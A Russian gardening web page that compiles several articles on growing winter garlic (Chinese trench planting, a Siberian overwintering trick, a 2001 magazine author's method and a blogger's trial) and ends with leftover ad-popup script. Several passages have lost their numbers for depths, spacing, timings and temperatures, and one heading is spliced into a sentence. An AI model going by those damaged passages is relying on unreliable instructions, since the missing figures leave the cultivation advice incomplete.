1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Выращивание чеснока нетрадиционная методика

Чеснок: китайская технология выращивания

Родина чеснока – центральная Азия. Но сегодня наибольшие плантации этого пряного растения находятся в Китае, где он является одной из важнейших сельскохозяйственных культур. И поскольку в этом бизнесе китайцы достигли весьма неплохих результатов, имеет смысл обратить внимание на их методы выращивания. А технологии у них несколько отличаются от традиционно принятых у нас. Вероятно, именно благодаря этому урожаи у них получаются несравненно более высокими, в отличие от наших.

Как выяснилось из опыта использования китайских технологий, ничего сверхъестественного в этом нет. Такой же урожай можно получать и в условиях России. Нужно всего лишь неукоснительно руководствоваться простым и понятным правилам.

Этот закон был известен сотни лет назад – в России это четырёхполье, или севооборот. Просто после каких растений какие растут лучше. Наилучшими предшественниками чеснока считаются зерновые или кормовые зернобобовые травы, а также различные огородные растения: огурцы, бахчевые культуры, капуста, бобовые, зелень. Запрещается минимум в течение трёх лет высаживать его после чеснока и лука. Весьма плохие предшественники – паслёновые, например, картофель и помидоры. Объясняется это тем, что у этих растений одинаковые болезни и вредители, которые могут передаваться через почву. Особо опасные заболевания – Чеснок: китайская технология выращивания

Подготовка почвы и грядок

Залог хорошего урожая – качество почвы. Поэтому примерно за 4–6 недель до предполагаемой посадки, ещё в августе, необходимо подготовить её под озимый чеснок. На будущей грядке во всю длину с интервалом 70–80 см следует прорыть траншеи примерно 25 см шириной и 18–19 см глубиной. Можно сделать грядку с двумя или тремя траншеями – это зависит от удобства доступа при обработке. В траншеи засыпается компост или выдержанный навоз, перемешивается с почвой и слегка утрамбовывается вровень с окружающим грунтом. Содержимое траншей поливается дезинфицирующим раствором, в качестве которого используется 0,2% раствор медного купороса. Подготовленная таким образом почва прикрывается плёнкой и оставляется до посадки.

С 20 сентября по 10 октября – лучшее в средней полосе время для посадки чеснока. Высаживают его по двум сторонам траншеи, таким образом, формируя двухрядные грядки. Требуется учесть, что посадочный материал (однозубки и зубки) должен успеть сформировать развитую корневую систему до глубины 10–12 см, но не должен прорасти. При слишком ранней посадке чеснок прорастёт, и появятся листья. При поздней – корневая система не успеет прорасти на необходимую глубину. И в том, и в другом случае часть растений может вымерзнуть.

Семенной материал, посадка

Перед посадкой здоровый, хорошо просушенный посадочный материал необходимо разделить на зубки и однозубки, а также откалибровать по четырём фракциям — мелкие, средние, крупные и особо крупные, затем все их продезинфицировать. Для этого их сначала нужно окунуть в раствор 120 г поваренной соли на 10 л воды – на 1–2 мин., и потом тут же в раствор 15 г медного купороса на 10 л воды – на 1 мин. Сразу после дезинфицирования посадочный материал, не промывая водой необходимо высадить на грядки.

Глубина заделки зубков – 4–5 см. Интервал должен составлять для самых крупных зубков и однозубок – 15 см, крупных – 11 см, средних – 9 см и мелких – 7 см. С учётом того, что чем больше по размерам зубок, тем крупнее из него вырастет головка, с такой посадки можно получить примерно равный урожай с одинаковой площади.

На случай слишком суровой зимы грядки можно замульчировать перегноем, торфом, сухой листвой или на крайней случай еловым лапником. Однако весной всю эту мульчу нужно удалить, а поверхность почвы слегка прорыхлить на пару сантиметров, дабы разрушить слежавшийся воздухонепроницаемый поверхностный слой, стараясь при этом не повредить всходы. При отсутствии дождей весной всходы необходимо поливать раз в 8–10 дней и немного чаще в слищком жаркую погоду.

Процесс выращивания, подкормка

После прорастания, когда появятся первые 3–4 листика, делается первая подкормка. Это, как правило, либо разбавленная водой в пропорции 1:6 навозная жижа, либо раствор столовой ложки мочевины на ведро воды. Навоз можно заменить птичьим помётом в соотношении 1:12. Вторую подкормку делать нужно через 15–20 дней, последнюю, третью – в середине июня. В состав последней неплохо добавить чайную ложку хлорида калия. Подкормку делают методом полива под самый корень. В случае если листья чеснока слишком сильно посветлели можно применить такое удобрение, как нитрофоска, разведя пару столовых ложек на ведро воды. Кроме стандартных удобрений можно использовать также специализированные комплексные препараты, которые появились в последнее время в продаже.

В Китае в основном выращивают стрелкующий чеснок. Он, как правило, даёт более высокий урожай, а кроме того, весьма полезные и вкусные стрелки, которые также широко используются в китайской гастрономии. Однако для получения более высоких урожаев стрелки желательно удалять. Делают это тогда, когда длина стрелок достигает 14–15 см. Для этой операции прекрасно подходят обыкновенные ножницы. Стрелки обрезают, оставляя пенёчек в 15–20 мм. Удаление стрелок реально повышает на 30–40% урожай головок чеснока.

На усмотрение огородника некоторое количество стрелок оставляется. Это необходимо для получения воздушных луковичек – бульбочек. Они, вместе с цветами образуются в соцветиях, расположенных в плотном чехле-бутоне на конце стрелок. Цветы, как правило, засыхают, ибо семена могут образовываться только в районах, где достаточно короткий световой день. После того как бутон раскроется, самые мелкие бульбочки желательно удалить пинцетом. В этом случае оставшиеся луковички достигнут гораздо больших размеров. Бутоны можно поместить в мешочек из марли, дабы созревшие воздушные луковички не выпадали на землю. Не следует забывать, что выращивание из бульбочек совершенно необходимая операция для «освежения» сорта. Ибо при выращивании из зубков уже на 3–4 год его урожайность падает, количество зубков уменьшается и сорт вырождается.

После образования головок чеснок, в отличие от лука, следует окучивать, нагребая над ним землю. Для предотвращения перегреваих на солнце окучивание производится, зарывая головку на глубину до 3–5 см, а по мере роста ещё выше, создавая возле неё канавку, в которую потом заливается раствор удобрения во время 1 и 2 подкормки.

Уборка, как правило, начинается в конце июня, но сроки сильно зависят от сорта и от погоды. Сроки лучше определять визуально по состоянию ботвы. Обычно зрелым считается чеснок, у которого к моменту уборки нижние листья пожелтели полностью, а верхние всего лишь наполовину или на треть. В зависимости от сорта при созревании листва может пожелтеть и полностью полечь.

При задержке с уборкой чеснок, как и большинства луковичных, может начать вторичный рост. Покровные чешуйки лопаются, головка расщепляется на отдельные зубки и после этого она становится непригодной для хранения. Убирать урожай желательно садовыми вилами, подкапывая ряды растений в тех местах, где головки заведомо не будут повреждены. Если позволяет погода, то выкопанные растения можно просушивать прямо на грядке, уложив их так, чтоб головки одного закрывались ботвой следующего. Длительность просушки — 2–3 дня, после чего растения нужно перевернуть и таким же просушить с другой стороны. Прикрывать головки ботвой нужно для того, чтоб они в процессе высушивания не зеленели и не размягчались. В случае неблагоприятной погоды сушить урожай лучше под навесом.

В отличие от ярового, озимый чеснок хоть и урожайнее, но обладает меньшей лёжкостью, посему его чаще используют для консерваций – маринований и солений. Свежий чеснок традиционно хранят в виде сплетённых в косу вязанок в вентилируемых помещениях. Зимой его лучше хранить при температуре 0–3 °C и влажности 75–80% в кладовках или подвалах. Для лучшей сохранности донца головок можно подпалить над огнём. Лучшая тара для хранения – решетчатые ящики по 20–25 кг. Для небольших объёмов можно использовать прогрессивные методы хранения в полиэтиленовых мешках с газоселективными вставками, либо в стеклянных банках с крышками подобной же конструкции.

Сибирский способ посадки чеснока – урожай гарантирован

Добавление статьи в новую подборку

Несмотря на суровую зиму и неоднозначное лето сибиряки предпочитают выращивать озимый чеснок вместо ярового: у него и урожайность выше, и хранится он дольше и, конечно, созревает раньше. Но в его посадке есть свои особенности и тонкости.

Урожай этой озимой культуры во многом зависит от качества посевного материала и его сортовой принадлежности, времени посадки и степени укрытия растений в морозные малоснежные зимы. В остальном выращивание чеснока мало чем отличается от его возделывания в других регионах страны.

Особенности выращивания чеснока в Сибири

Не стоит сажать на зиму тот чеснок, который откуда-то взялся у вас в холодильнике. Желательно подобрать районированный сорт.

В Сибири наиболее востребованы такие сорта, как Грибовский Юбилейный, Алькор, Еленовский, Спас, Софиевский, Любаша, Скиф, Новосибирский 1 и Сибирский. Они лучше приспособлены к условиям севера.

Для посадки выбирайте крупные неповрежденные зубчики. Обязательно проведите их дезинфекцию в растворе марганцовки или золы (250 г золы растворите в 1 л воды и прокипятите 30 мин., используйте после остывания).

Большие головки чеснока вырастают только из крупных зубчиков. Для посадки подходят внешние зубки, а внутренние используйте в пищу.

Очень многое зависит и от времени посадки. Если высадить чеснок слишком рано, быстро образующаяся наземная часть может замерзнуть от первых заморозков. Поздняя посадка не дает зубчикам хорошо укорениться, что также может привести к гибели растения. Поэтому рекомендуется высаживать чеснок за 30-45 дней до наступления холодов.

Для посадки чеснока лучше всего подходят суглинистые с низкой кислотностью или нейтральные почвы. На них не должна скапливаться влага, иначе зубчики могут сгнить. Лучшие предшественники для чеснока – огурцы, кабачки и капуста.

В зависимости от размеров зубчиков, регулируется глубина их высадки (3-4 см – мелкие, 6-7 см – крупные). В Западной Сибири следует увеличить глубину. Чтобы корни растений могли нормально развиваться, зубчики нужно высаживать на расстоянии не менее 5 см друг от друга.

После посадки замульчируйте чеснок листьями или сухой травой. На протяжении зимы следите за снежным покровом на грядке. Если он небольшой, дополнительно прикройте посадку лапником или досыпьте снега.

Но есть и другой способ посадки озимого чеснока. Метод, по которому уже 10 лет выращивает культуру Мария Пахитова из г. Братск, позволяет растению хорошо перезимовать и избавляет от забот о нем в ноябре и апреле.

Метод Марии Пахитовой выращивания озимого чеснока в Сибири

В неоднозначном климате Сибири довольно сложно получить хороший урожай овощей. Зимы здесь морозные, а лето зачастую в первой половине – жаркое и сухое, а во второй – дождливое и прохладное. Поэтому огородники идут на разные ухищрения, чтобы минимизировать влияние погоды на рост и развитие культур.

Удалось найти свой уникальный метод и Марии Геннадьевне Пахитовой, у которой ежегодно озимый чеснок радует урожайностью. В чем же ее секрет? Дело в том, что осенью она не высаживает чеснок, а закапывает его.

В октябре на самом высоком месте участка Мария Геннадьевна выкапывает яму глубиной в два штыка лопаты, на дно которой укладывает мох сфагнум и лапник. На такую сухую подстилку помещает полотняный мешочек с головками озимого чеснока, сверху прикрывает его лапником и закапывает яму, плотно утрамбовывая землю. Место отмечает колышком, чтобы потом было легче его найти.

Одновременно готовит и грядку под будущую посадку, т.к. весной из-за мерзлого грунта это сделать сложнее. По всей длине грядки земля вынимается на штык лопаты и складывается рядом. В конце апреля дно этой траншеи женщина заполняет прошлогодней ботвой, навозом, золой и возвращает снятую почву на место.

Когда земля оттает, обычно это происходит на майские праздники, выкапывает мешочек с чесноком. К этому времени у культуры уже отросли корешки и начали пробиваться перья. Мария аккуратно разбирает головки чеснока на зубчики, избавляя их от шелухи.

Полученный посадочный материал замачивает в растворе удобрения с микроэлементами и добавлением марганцовки. Затем высаживает зубчики в бороздки на подготовленной грядке на глубину 5 см, присыпает их землей и поливает водой. Через несколько дней грядка покроется дружными зелеными всходами.

Уход за высаженным таким образом чесноком обычный. Урожай его крупных головок можно будет убирать в августе.

По мнению кандидата сельскохозяйственных наук Николая Хромова, такой уникальный метод выращивания озимого чеснока не только подойдет для жителей Сибири, но с успехом может быть использован в условиях средней полосы.

Выращивание чеснока: нетрадиционная методика

Выращивание чеснока нетрадиционным способом. Практический опыт успешного выращивания чеснока в приусадебном хозяйстве по собственной методике

Выращивание чеснока, наряду с огурцами и помидорами, — дело нелегкое. Чеснок — культура капризная — он то вымокнет, то вымерзнет, то выпреет. Более того, в последние годы, чеснок постоянно поражается ржавчиной: не успеют отрасти 1 —2 листа, как тут же начинают желтеть их кончики, а затем на листовых пластинах появляются предательские желтые пятна. Справиться с последствиями болезни — преждевременным засыханием и отмиранием листьев — уже невозможно: ложный стебель становится мягким и надземная часть полегает.

Как предотвратить этот процесс? Как получить качественную продукцию? Как вырастить крупный чеснок? Эти вопросы встали и передо мной, когда я вплотную занялся огородничеством. Ответы на вопросы я искал в научной литературе, периодических изданиях, в общении с практиками-огородниками.

За более чем 20 лет увлеченного занятия огородничеством накопил опыт, познал некоторые секреты выращивания чеснока. Твердо усвоил, что высокий урожай можно получить только на плодородной почве, при наличии здорового посадочного материала и соблюдении технологии выращивания — от посадки и до уборки.

Выбор места для посадки, подготовка почвы

Для посадки выбираю ровную грядку на возвышенности, где не бывает застоя талых весенних и дождевых вод. В низменных сырых местах чеснок выпревает. Его нельзя выращивать под фруктовыми деревьями и рядом с высокорослыми растениями, он не выносит затенения.

Заметил, что хороший урожай получается на грядке, которая хорошо прогревается и освещается солнцем в первой половине дня и менее интенсивно — во второй.

Почву на грядке под чеснок перекапываю на глубину Делаю это за месяца до посадки, чтобы почва осела и уплотнилась естественным путем. Если чеснок посадить сразу после перекопки, зимой зубки могут оказаться очень близко к поверхности почвы и вымерзнут.

Почва должна быть плодородной и рыхлой. Перед перекопкой земли, из расчета на 1 м 2 площади, вношу 1 ведро перегноя, 20 г аммиачной селитры, суперфосфата, калийной соли.

Иногда азотное удобрение (если оно отсутствует) заменяю куриным пометом на 1 м 2 ), а калийное — древесной золой (1 литровая банка на 1 м 2 ).

Свежий навоз чеснок не любит. Также вреден для него избыток азотных удобрений — это может спровоцировать обильное нарастание листьев и стебля в ущерб луковице.

Соблюдаю севооборот, возвращая чеснок на прежнее место не ранее чем через Лучшие предшественники для чеснока — помидоры, огурцы, ранняя белокочанная капуста. Важно: нельзя высаживать чеснок после лука и картофеля.

Подбор посадочного материала — решающий фактор

Заметил, что продуктивность чеснока в значительной степени зависит от качества посадочного материала. Он может быть собственным, приобретенным на рынке или полученным в результате обмена с соседями по огороду.

Какой из них лучше? Я пришел к выводу, что самый надежный посадочный материал — собственный. Правда, его можно использовать не более 5 лет подряд, затем начинается вырождение, поражение болезнями, даже при том, что строго соблюдается весь технологический процесс.

Оказывают влияние и изменения в составе почвы, и климатические условия. Как правило, ежегодно обновляю посадочный материал на одну треть.

С этой целью на наиболее мощных крепких растениях оставляю стрелки (цветоносы) с воздушными луковичками. Когда они созреют, отбираю самые крупные головки и закладываю на хранение до весны.

Весной высаживаю луковиц на небольшую грядку по схеме 5×8 см (глубина заделки или в междурядья моркови. К осени из луковиц вырастают однозубки. Выкапываю их вместе с чесноком и сразу отбираю здоровых луковиц (без повреждений и желтизны). Они служат посадочным материалом для обновления. Как посадочный материал луковицы по качеству превосходят зубки.

Покупать посадочный материал чеснока на рынке не рекомендую. Сегодня трудно купить местные сорта-старожилы, которые приспособились к сложившимся почвенно-климатическим условиям.

Грядки заполонил чеснок, завезенный не только из других районов, областей, но и из других стран, где иные почвенно-климатические условия. Это привело к тому, что в ряде районов чеснок вырождается, так как поражается заболеваниями, с которыми мы раньше не сталкивались. Однако среди новинок (у них нет официального названия) есть и такие, которые, судя по всему, должны прижиться в наших почвенно-климатических условиях.

Людмила Булавчик с сыном

Практический опыт

Семья Булавчик из села Хотяновка два года успешно выращивает сорт Гигант, у которого необычайно крупная луковица (до 160 г). История появления этого сорта довольно любопытная. Хозяйка купила на рынке по случаю очень крупные однозубки.

В конце сентября, перед посадкой, каждую из них разрезали вертикально, строго по центру на 4 части, продезинфицировали в растворе марганцовки, обваляли в пепле и высадили 40 четвертинок на грядку на глубину

К величайшему удивлению, весной появились дружные всходы. Стебель и листья у растений были намного мощнее, чем у обычного чеснока, который рос рядом. При уборке новичок поразил всех необычайно крупной луковицей и наличием на ней деток. Стрелки с соцветиями также были значительно крупнее.

Чеснок, сорт Гигант

Для получения посадочного материала на следующий год ранней весной высадили крупные воздушные луковички и детки, которые сформировались вокруг донца луковицы. Выкопали их вместе с чесноком и положили на хранение до осени.

В качестве посадочного материала использовали однозубки, выращенные из воздушных луковиц и деток (можно использовать и зубки, но это очень невыгодно). Вкусовые качества чеснока прекрасные, лежкость отличная, он не прорастает до мая.

Чеснок, сорт «Кенгуренок»

Семья Сливы из дачного кооператива «Пролесок» выращивает чеснок, который отличается от традиционных сортов тем, что головки располагаются не в шаровидном зонтике, а внутри ложного стебля сразу над луковицей. За столь необычный внешний вид этот сорт назвали Кенгуренок. Размножается он зубками и однозубками, выращенными из головок.

Луковицы у Кенгуренка довольно крупные, мякоть нежная, сочная, с приятным, хорошо выраженным чесночным ароматом и мягким, полуострым вкусом. Лежкость хорошая, луковицы не загнивают, не высыхают, не прорастают, могут храниться до следующего урожая.

Посадка чеснока — немаловажный прием

Убедился на практике, что большое влияние на перезимовку и продуктивность чеснока оказывают срок и глубина посадки. Опробовал на практике все рекомендации, касающиеся сроков посадки.

Одни рекомендовали высаживать чеснок до первых заморозков, другие — после наступления устойчивых холодов и т. д., а более конкретного времени не указывали. Путем эксперимента (высаживал чеснок в разное время) пришел к выводу, что лучший срок посадки (в условиях Киевской области) — с 29 сентября по 5 октября. В это время почва еще достаточно теплая и прорастающие корни хорошо в нее заглубляются, зубки не выходят на ее поверхность и перезимовывают без потерь.

При посадке в холодную почву образовавшиеся корни, проникая в нее с трудом, выносят зубки на поверхность, что приводит к их вымерзанию даже в относительно теплые зимы.

Не мог я принять и рекомендации относительно глубины посадки (заглублять на или Следуя им, два года оставался без чеснока — он вымерзал в почве или на поверхности, когда преждевременно всходил.

С моей точки зрения, оптимальная глубина посадки чеснока Приведу свои аргументы. В осенний период, каким бы теплым он ни был (к примеру, осень 2000 г.) появление всходов задерживается. Есть возможность проводить более глубокое рыхление почвы без боязни повредить корни (у чеснока они плохо поддаются восстановлению), а значит, лучше обеспечить корневую систему кислородом.

Не нужно укрывать грядки толстым слоем листьев или соломы, под который устремляются на перезимовку вредители со всего огорода. Требуется лишь минимальное укрытие (слой до 5 см). Во время подкормок удобрения не сразу попадают на корни, а поступают к ним постепенно. Летом, в период засухи, не требуются частые поливы, так как корни на глубине чувствуют себя комфортно. На такой глубине зубки оказываются в результате незначительного подъема корнями, поверхностного размывания почвы дождями и ее уплотнения.

За дня до посадки грядку поливаю раствором марганцовки. Утром, в день посадки, отделяю зубки от головок. Поврежденные, с желтыми пятнами у донца зубки и луковицы отбраковываю. Заранее готовлю три трехлитровые емкости:

Одну — с солевым раствором (1/2 стакана соли на 3 л воды), вторую — с раствором марганцовки (интенсивного розового цвета), третью — с чистой водой.

Отобранный посадочный материал кладу в марлевый мешочек и погружаю в солевой раствор на 5 мин, прополоснув в чистой воде, погружаю в теплый °С) раствор марганцовки на вновь прополаскиваю и раскладываю на мешковине для проветривания.

Хорошо обеззараживает посадочный материал раствор формалина, в котором марлевый мешочек с чесноком нужно подержать 10 мин, после чего накрыть зубки мешковиной, «протомить» их в течение 2 ч, затем проветрить и высаживать.

Высаживая чеснок, расстояние между растениями в ряду оставляю —10 см, междурядья — 15 см.

Уход за чесноком определяет его продуктивность и качество

Весной, с наступлением солнечных дней, не спешу снимать укрытие. Снимаю, когда устанавливается стабильная температура, чтобы ночные заморозки не повредили нежные ростки. А если чеснок и начинает расти, то укрытие ему не помеха.

Снимать его граблями нельзя, так как можно повредить ростки. За зиму оно слежалось и легко снимается рыхлителем. После снятия укрытия почву хорошо рыхлю, чтобы обеспечить доступ кислорода к корням, и провожу первую подкормку раствором коровяка (1:10) или куриного помета (1:12).

Раствор вношу в бороздки между рядками (2 л на 10 растений). Вторично подкармливаю сразу после обламывания стрелок (при их длине тем же раствором.

После удаления стрелок провожу приемы, способствующие увеличению массы луковиц. Один из них позаимствовал у огородников Закавказья: все листья собираю на уровне обломанной стрелки и завязываю в узел.

Вторым приемом пользуются огородники в европейских странах: все листья собирают в пучок и обрезают верхнюю часть на уровне сломанной стрелки. Что это дает? Завязывание листьев в узел или их укорачивание уменьшает отток в них питательных веществ, и основная масса направляется в луковицу.

Чтобы чеснок не поражался ржавчиной, дважды за вегетацию обрабатываю растения солевым раствором (один граненый стакан на 10 л воды) из лейки без распылителя. Первый раз при высоте ростков второй — Поливаю дважды зольным раствором банка древесной золы на 10 л воды). Первый раз при высоте ростков второй —15-17 см.

Перед подкормкой или обработкой солевым раствором учитываю влажность почвы. Если земля очень сухая, вначале грядку слегка поливаю, чтобы раствор не ушел в сухую почву ниже корней. На второй день грядку вновь слегка поливаю, почву рыхлю и мульчирую тонким слоем торфа или перегноя, смешанных с землей в соотношении 1:2.

Чеснок — влаголюбивая культура. Для его нормального развития необходима повышенная влажность почвы в период всходов и нарастания листьев. Затем (в зависимости от погоды) достаточно поливать растения один раз в

Уборка чеснока

Когда убирать чеснок? Это извечный вопрос, волнующий огородников. От правильного ответа в значительной мере зависит качество выращенного чеснока. При преждевременной уборке луковицы могут оказаться недозревшими, при запоздалой уборке — покровная чешуя трескается, луковицы рассыпаются на зубки и становятся непригодными для хранения.

Пришел к выводу, что идеальное время для уборки чеснока — День святых Петра и Павла (12 июля). Праздник по срокам не меняется и его легко запомнить. После праздника через 3 дня (не позже), в зависимости от погоды, копаю чеснок.

Стараюсь выкапывать в сухую погоду во второй половине дня. Выкопанный чеснок с листьями и корешками укладываю на стеллаж или подвешиваю пучками для дозаривания на 12— 15 дней. Луковицы получаются плотные, хорошего качества.

После дозаривания чеснок сортирую: обрезаю корешки и ложный стебель на высоте от луковицы, очищаю от первого слоя чешуи.

Лучшие головки отбираю для осенней (стрелкующийся) и весенней (нестрелкующийся) посадок. Часть оставляю для потребностей до нового урожая, а остальной — на переработку.

Я в основном выращиваю озимый стрелкующийся чеснок, он выгодно отличается от ярового по величине зубков и головок, что немаловажно осенью, в период массовой заготовки овощей на зиму.

Заключение

В заключение хочу сказать, что отдельные приемы возделывания чеснока, которые я использую (глубина и время посадки, полив солевым раствором), вызовут у некоторых специалистов и огородников возражения и недоверие.

На первых порах подобные сомнения были и у моих знакомых, соседей по даче. Но ежегодная перезимовка чеснока без потерь, внешний вид растений в период вегетации, а главное — урожайность стали вескими аргументами в пользу предлагаемой мною технологии выращивания чеснока.

Те, кто строго ее придерживается, ежегодно получают отменный урожай чеснока, значительную часть которого реализуют на рынке. В прежние времена (по их утверждению) об этом они и не мечтали, чеснока едва хватало для удовлетворения потребностей семьи.

Я уверен, что для получения высокого урожая любой культуры недостаточно познать секреты ее выращивания. Главное, чтобы земля почувствовала теплоту ваших рук, и только тогда она отблагодарит за труд, заботу обильным урожаем.

Автор: Виктор Лисовик (журнал Огородник 10/2001)

tasha_jardinier

Садовое обозрение

Garden review

Сегодня никого не удивишь китайской речью в деревнях с богатыми землями. Трудолюбивые китайцы выращивают тысячи тонн овощей, которые затем поступают в магазины и рынки нашей страны. Внешне они привлекательны, но количество, подчас неизвестных в нашей стране, минеральных удобрений и ядохимикатов, используемых китайцами, наводит на самые мрачные мысли.

Когда же мне со всеми подробностями рассказал опытный агроном, как китайцы добиваются больших урожаев чеснока, решила попробовать китайский метод, но с российской предосторожностью и ориентируясь на собственный опыт.

Важное в китайском методе – схема посадки. Для посадки озимого чеснока берут сухие, хорошо освещенные участки, где летом росли бобовые или зеленные культуры, кабачки, капуста, тыква или огурцы. После других культур нельзя, так как есть угроза поражения чеснока нематодой и фузариозом, а почва под чесноком и луком устала.

Подготовку почвы начинают в августе. Грядку нарезают с севера на юг. На всю длину делают две канавки шириной 25 см и глубиной 18- 20 см . Расстояние между канавками 70- 80 см . Канавки засыпают смесью садовой почвы с компостом или полуразложившимся навозом, слегка уплотняют и поливают теплым раствором медного купороса (1 ст. ложка на 10 л воды). Границы канавок должны четко прослеживаться. Готовую грядку накрывают пленкой.

В первую декаду октября сортируют посадочный чеснок, разделяя зубки и однозубки на фракции: самые крупные, крупные, средние и мелкие. Помещают их в марлевые мешочки. Опускают мешочки с посадочным материалом в солевой раствор (3 ст. ложки поваренной соли на 5 л воды) на 2 минуты, затем на 1 минуту в раствор медного купороса (0,5 ч. ложки на 5 л воды). Непромывая в чистой воде зубки высаживают на гряды.

Сажают чеснок по двум сторонам канавок, создавая двурядные грядки. Сначала сажают самые крупные на расстоянии 15 см друг от друга, затем крупные на расстоянии 11 см , средние через 9 см , а мелкие через 7 см . Глубина заделки – 4- 5 см . Такой способ позволяет облегчить уход за посадками и получить выровненные всходы. Если в конце октября наступают морозы без снежного покрова, грядки мульчируют торфом, перегноем или сухим листом. Впрочем, такое мульчирование не помешает и в снежную зиму, если ожидаются сильные морозы зимой.

Рано весной мульчу снимают, почву неглубоко рыхлят стараясь не повредить всходы. При отсутствии в мае дождей чеснок поливают раз в 10 дней, а в жару почаще. Первую подкормку делают при образовании 3-4 листьев, вторую через 15-20 дней, третью — последнюю — 10-20 июня. Когда вырастут стрелки приблизительно на 14- 15 см , а общая высота чеснока достигнет в среднем 30 см , их следует выломать или вырезать косым срезом, оставляя пенек 1,5- 2 см . Для получения бульбочек на посев, оставляют несколько цветочных стрелок. А чтобы бульбочки были крупными, пинцетом удаляют самые мелкие, едва чехольчик раскроется. Для предотвращения высыпания бульбочек, на чехлики надевают марлевые мешочки.

И еще один важный момент. Чтобы чеснок не перегревался на солнце и не зеленел, за лето его дважды окучивают, нагребая по 3- 5 см каждый раз. В результате между рядками образуются канавки, в которые и льют воду для полива и подкормку.

Убирают чеснок, когда крайние нижние листья полностью пожелтеют, а средние — на одну четверть или треть. Выкопанный в хорошую погоду чеснок раскладывают на грядке рядами так, чтобы перо второго ряда прикрывало головки первого ряда и т. д. Сушат 2-3 дня, затем переворачивают на вторую сторону и сушат еще столько же. За это время чеснок хорошо просыхает, солнце не припекает луковицы, они не зеленеют и зубки внутри не размягчаются. Если погода неустойчивая, чеснок лучше разложить под навесом.

Китайцы при выращивании чеснока проводят подкормки минеральными удобрениями, в довольно больших объемах. Я же использовала только органику и древесную золу, да еще осенью вносила доломитовую муку.

А теперь подробнее о том, как я выращивала в первый сезон озимый чеснок с использованием китайской технологии. Сажала чеснок на двух грядах. Первую – точно по-китайски, вторую как обычно – на расстоянии 15 см друг от друга и между рядками 20 см друг от друга. Зубки для старого метода не сортировала по размеру, протравливала только в розовом растворе марганцовки.

Весной подкормила весь чеснок настоем коровяка. В мае было жарко, поэтому поливала. Скажу честно, показалось, что китайский чеснок занимает слишком много места, поэтому на 2-х метрах этой грядки подсеяла по краю рядок шпината. Уж он-то точно уживается с чесноком. Когда шпинат съели, уже с другой стороны подсадила рассаду листового салата. Разницы между чесноком без подсадки и уплотненным не видела.

С конца мая по середину июня 2 раза поливала весь чеснок сброженным зеленым удобрением. В конце июня перед окучиванием посыпала посадки древесной золой, а через неделю полила настоем окопника.

Урожай чеснока по старому и по китайскому методам созрел одновременно. Ухаживать за посадками чеснока по китайки было легче. Да и урожайность оказалась выше. Причем не только в грядке, но и в пересчете на 1 кв.м. Чеснок, выращенный по китайской технологии, был крупнее. Даже из мелких зубчиков выросли полноценные головки. На старой грядке и на китайской вырастила по 100 головок, но вес в первом случае был на 2,3 кг больше. И хранился этот чеснок отлично. Из того, что использовали на заготовки, у китайского не обнаруживала никаких пятен или повреждений, у выращенного по старому способу в одной головке 2 зубчика имели темные водянистые пятна. Добавлю, что выращивали чеснок сортовой – Лекарь и Грибовский юбилейный.

В нынешнем сезоне весь чеснок выращивала по китайской методе с русским акцентом. Это были сорта Лекарь и Алькор. Урожай отменный. А из бульб сорта Грибовский юбилейный выросли крупные диаметром от 1,5 до 2,5 см .

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
